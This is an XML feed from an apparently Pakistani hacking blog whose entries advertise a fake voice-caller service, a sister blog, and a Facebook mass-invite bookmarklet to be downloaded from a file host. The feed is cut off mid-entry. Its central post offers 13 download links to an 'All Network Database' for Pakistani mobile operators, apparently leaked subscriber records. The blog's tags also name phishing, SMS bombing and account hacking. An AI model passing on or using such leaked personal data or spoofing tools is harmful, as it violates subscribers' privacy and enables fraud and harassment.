<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6522232511392000207</id><updated>2026-03-24T18:30:32.037+05:00</updated><category term="Hacking-Tools"/><category term="Hacking-Tutorials"/><category term="Website Hacking"/><category term="Tips And Tricks"/><category term="Hacking Tutorials"/><category term="Anonymity-Tools"/><category term="Blogger-Widgets"/><category term="Facebook Hacking"/><category term="Blogger-Template"/><category term="Wifi Hacking"/><category term="Backtrack Hacking"/><category term="Cyber News"/><category term="Dorks"/><category term="Phishing Hacking"/><category term="Database"/><category term="Jazz Database"/><category term="Network Database"/><category term="Phishing"/><category term="SEO"/><category term="Sms Bomber"/><category term="Telenor Database"/><category term="Ufone Database"/><category term="Video Tutorials"/><category term="Warid Database"/><category term="Zong Database"/><category term="Brute Force"/><category term="Earn Money"/><category term="Full Version Windows"/><category term="Hacking-eBooks"/><category term="IP Hacking"/><category term="Latest Database"/><category term="Original Window"/><category term="Other Tools"/><category term="PHP"/><category term="PHP Scripts"/><category term="Password Hacking"/><category term="Penetration Test"/><category term="Window 8"/><title type='text'>Hacking Tools And Hacking Tutorials</title><subtitle type='html'>Get Full Free Hacking Tools, Hacking Tutorials, Hacking E Books, Hacking Guidelines, Website Hacking, Facebook Hacking, Email Hacking Tools And Tutorials. FOCSoft</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default?alt=atom'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default?alt=atom&amp;start-index=26&amp;max-results=25'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>212</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-377658726093719067</id><published>2014-06-20T10:22:00.001+05:00</published><updated>2014-06-20T10:22:20.218+05:00</updated><title type='text'>Free Fake Online Voice Caller, Send Free Sms To Voice Calls - PAKL33T | Daily Tips And Tricks For Facebook | Computer | Mobile.</title><content type='html'>&lt;a href=&quot;http://www.pakl33t.com/2014/06/Fake-Voice-Caller.html&quot;&gt;Free Fake Online Voice Caller, Send Free Sms To Voice Calls - PAKL33T | Daily Tips And Tricks For Facebook | Computer | Mobile.&lt;/a&gt;</content><link rel="related" href="www.pakl33t.com/2014/06/Fake-Voice-Caller.html" title="Free Fake Online Voice Caller, Send Free Sms To Voice Calls - PAKL33T | Daily Tips And Tricks For Facebook | Computer | Mobile."/><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/377658726093719067/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/06/free-fake-online-voice-caller-send-free.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/377658726093719067'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/377658726093719067'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/06/free-fake-online-voice-caller-send-free.html' title='Free Fake Online Voice Caller, Send Free Sms To Voice Calls - PAKL33T | Daily Tips And Tricks For Facebook | Computer | Mobile.'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-2712483072100606256</id><published>2014-05-06T08:24:00.002+05:00</published><updated>2014-05-06T08:24:38.998+05:00</updated><title type='text'>[Must Read] Tips And Tricks Corner By FOCSoft Administrater, MS</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;i&gt;Assalam&lt;/i&gt; O &lt;i&gt;Alikum&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt; &lt;span style=&quot;color: #6fa8dc;&quot;&gt;Friends&lt;/span&gt;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; We Have Create A New &lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Blog&lt;/b&gt; &lt;/span&gt;&lt;/span&gt;Related &lt;i&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Tips And Tricks&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;.&lt;br /&gt;
We&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt; &lt;i&gt;&lt;b&gt;Need&lt;/b&gt;&lt;/i&gt; &lt;/span&gt;&lt;/span&gt;Your &lt;span style=&quot;color: #38761d;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Support&lt;/span&gt;&lt;/span&gt; For Our New Blog,&lt;br /&gt;
If You Have Any &lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;Suggestion&lt;/b&gt;&lt;/span&gt;&lt;/i&gt; Related Our New &lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;B&lt;i&gt;lo&lt;/i&gt;g&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;, Then &lt;span style=&quot;color: #3d85c6;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Kindly Kindly&lt;/span&gt;&lt;/span&gt; Reply....&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;background-color: #f4cccc;&quot;&gt;&lt;span style=&quot;color: #3d85c6;&quot;&gt;Click Below Link For Our New Blog&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;......&lt;br /&gt;
Our Blog Related These Topics.&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Learn Hacking, FaceBook Hacking, Free Internet Tricks, Facebook Tricks, Latest All Network Database, SEO, SMO, Google Adsense Tricks, Earn Money, etc&amp;nbsp;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: #6fa8dc;&quot;&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;a href=&quot;http://pakleet.blogspot.com/&quot; target=&quot;_blank&quot;&gt;Please Click Here&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/2712483072100606256/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/05/PAKLeet.html#comment-form' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/2712483072100606256'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/2712483072100606256'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/05/PAKLeet.html' title='[Must Read] Tips And Tricks Corner By FOCSoft Administrater, MS'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-501385422216889625</id><published>2014-03-26T22:55:00.000+05:00</published><updated>2014-05-06T06:12:43.353+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Database"/><category scheme="http://www.blogger.com/atom/ns#" term="Jazz Database"/><category scheme="http://www.blogger.com/atom/ns#" term="Latest Database"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Database"/><category scheme="http://www.blogger.com/atom/ns#" term="Telenor Database"/><category scheme="http://www.blogger.com/atom/ns#" term="Ufone Database"/><category scheme="http://www.blogger.com/atom/ns#" term="Warid Database"/><category scheme="http://www.blogger.com/atom/ns#" term="Zong Database"/><title type='text'>Latest All Network Database Working 100% - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://t0.gstatic.com/images?q=tbn:ANd9GcTYnWe7Es8QSB8kyRmRgBojMVxdikwOqmtJd17DY4xXwcKPk_kKdg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;Latest All Network Database Working 100% - FOCSoft&quot; border=&quot;0&quot; src=&quot;http://t0.gstatic.com/images?q=tbn:ANd9GcTYnWe7Es8QSB8kyRmRgBojMVxdikwOqmtJd17DY4xXwcKPk_kKdg&quot; height=&quot;318&quot; title=&quot;Latest All Network Database Working 100% - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h4 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Hi Friends&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;h4 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;[Assalam O Alikum]&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;h4 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Database Posted&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;By:-&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt; &lt;a href=&quot;https://www.facebook.com/PrinceOfSahuka&quot; target=&quot;_blank&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;Muhammad &lt;/span&gt;SHAHBAZ&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;h4 style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;span style=&quot;color: #93c47d;&quot;&gt;&lt;span style=&quot;font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;http://focsoft.blogspot.com/&quot;&gt;FOCSoft.Blogspot.com&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Today I&#39;m Share All Networks &lt;b&gt;Database&lt;/b&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;(&lt;b&gt;Jazz&lt;/b&gt;, &lt;b&gt;Telenor&lt;/b&gt;, &lt;b&gt;UFone&lt;/b&gt;, &lt;b&gt;Zong&lt;/b&gt;, &lt;b&gt;Warid&lt;/b&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Only For &lt;b&gt;Pakistan&lt;/b&gt;&lt;/span&gt;&lt;b&gt;i &lt;/b&gt;Friends, Because IT Is Working Only For Pakistani &lt;b&gt;Networks&lt;/b&gt;.&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&amp;nbsp; &lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;Download &lt;/b&gt;From &lt;b&gt;Here &lt;/b&gt;- &lt;b&gt;&amp;amp; &lt;/b&gt;- Stay &lt;b&gt;Here &lt;/b&gt;For &lt;b&gt;More &lt;/b&gt;:p&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
Download &lt;b&gt;13 &lt;/b&gt;Parts &lt;b&gt;Of &lt;/b&gt;The &lt;b&gt;Database&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: yellow;&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #6fa8dc;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-family: Times,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;No Need &lt;span style=&quot;font-size: large;&quot;&gt;Any&lt;/span&gt; Password&lt;span style=&quot;font-size: large;&quot;&gt; For These Files&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/u&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- &lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 1&lt;/a&gt; ~ &lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 2&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 3&lt;/a&gt; ~ &lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 4&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 5&lt;/a&gt; ~ &lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 6&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 7&lt;/a&gt; ~ &lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 8&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 9&lt;/a&gt; ~ &lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 10&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 11&lt;/a&gt;&amp;nbsp; ~ &lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 12&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;background-color: yellow;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot; target=&quot;_blank&quot;&gt;Download Part 13&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^-^&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;For Extract Use 7z Or Winrar&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;Use vMware Or My SQL Server 2000 For This Database &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;background-color: cyan;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;&amp;nbsp;All Links Updated Successfuly&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;i&gt;If These Links Not Works Try Out This,&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;font-size: x-large;&quot;&gt;&lt;a href=&quot;http://pakleet.blogspot.com/2014/05/Database.html&quot;&gt;All Network Database&lt;/a&gt;&lt;/span&gt; &lt;/b&gt;&lt;br /&gt;
&lt;b&gt;-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- &lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;If You Want Any Kind Help, Then Please Comment Bellow. &lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/501385422216889625/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/02/latest-all-network-database_13.html#comment-form' title='46 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/501385422216889625'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/501385422216889625'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/02/latest-all-network-database_13.html' title='Latest All Network Database Working 100% - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>46</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-364505152558126181</id><published>2014-03-25T17:53:00.000+05:00</published><updated>2014-03-25T17:53:42.277+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tips And Tricks"/><title type='text'>How To Invite All Friends To Like Page Just In One Click (Easy Way) - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
Just a few days ago, I sent over 2,500 invitations to my facebook 
friends, asking them to like my fan page. You think I selected them one 
by one? Come on, you know that’s definitely not possible, I used a 
simple javascript that saved me the trouble of selecting them one after 
the other. With this script, I was able to select all friends and send 
the fan page invitation. Selecting your friends can be quite stressful 
especially if the page is new and you have tons of invites to send.&lt;/div&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
&lt;b&gt;So, how Did I go about it?&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
Like I told you before, it’s nothing but a simple piece of &lt;b&gt;java-script&lt;/b&gt; but we’re going to make a bookmark let with it&lt;br /&gt;
&lt;br /&gt;
First download Java script from here &lt;span style=&quot;font-size: large;&quot;&gt;&lt;a href=&quot;http://freakshare.com/files/l4fblm2e/java-script.rar.html&quot; target=&quot;_blank&quot;&gt;Click here&lt;/a&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
Now open your chrome browser and right click on&lt;b&gt; Bookmark tab&lt;/b&gt; and click &lt;b&gt;Add Page&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot;How To Invite All Friends To Like Page Just In One Click (Easy Way) - FOCSoft&quot; border=&quot;0&quot; height=&quot;380&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGmfFwyZXJxVoapZvZr5uGqq4Gq5KFCTmZzo5zCCdos1urlOLtXGkrgSq3aejMzn2xDBkphsxatxPDVkVrCsyVZqlg8o94ETi2dfjv5bXAm2ooltMLlSaIaNG9kC5Jbni_oGzXrVtzImo/s400/free.jpg&quot; title=&quot;How To Invite All Friends To Like Page Just In One Click (Easy Way) - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
-Than open the New bookmark option and Insert link in tab and save &lt;br /&gt;
&lt;br /&gt;
- After that, go to your fan page and click on Build Audience &amp;gt; Invite Friends&lt;/div&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
- When your friends list come up, simply click on the bookmarklet you &lt;b&gt;created&lt;/b&gt; toolbar earlier.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot;How To Invite All Friends To Like Page Just In One Click (Easy Way) - FOCSoft&quot; border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWG8ZI9PnkKXMq1Ou_hSDZmqKmu4AVpzf1HYQM1yMMX_dBNNhjWGDb-syiEZEjccywHYvuu71yxO8vtEgtZwgqt1YN1BaTl8YGSZsYr9DtVvcF8lr_oQz1Lt8C-Xu_JW2o7P3hyMEUyXc/s400/ftee.jpg&quot; title=&quot;How To Invite All Friends To Like Page Just In One Click (Easy Way) - FOCSoft&quot; width=&quot;388&quot; /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
- It automatically selects all your friends and you can now send the invitation!&lt;/div&gt;
&lt;div style=&quot;-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Lora, serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25px; margin: 0px 0px 25px; orphans: 2; padding: 0px; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;
Hey, you may have to repeat this process a number of times depending on 
the number of people you have on your list. I tried it on a fan page but
 a friend also said it worked for event invitation. In case you have a 
facebook group too, you can try it and let us know if it works.&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/364505152558126181/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/AutoInvite.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/364505152558126181'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/364505152558126181'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/AutoInvite.html' title='How To Invite All Friends To Like Page Just In One Click (Easy Way) - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGmfFwyZXJxVoapZvZr5uGqq4Gq5KFCTmZzo5zCCdos1urlOLtXGkrgSq3aejMzn2xDBkphsxatxPDVkVrCsyVZqlg8o94ETi2dfjv5bXAm2ooltMLlSaIaNG9kC5Jbni_oGzXrVtzImo/s72-c/free.jpg" height="72" width="72"/><thr:total>1</thr:total><georss:featurename>Būrewāla, Pakistan</georss:featurename><georss:point>30.15 72.683333299999958</georss:point><georss:box>30.0950815 72.60265229999996 30.204918499999998 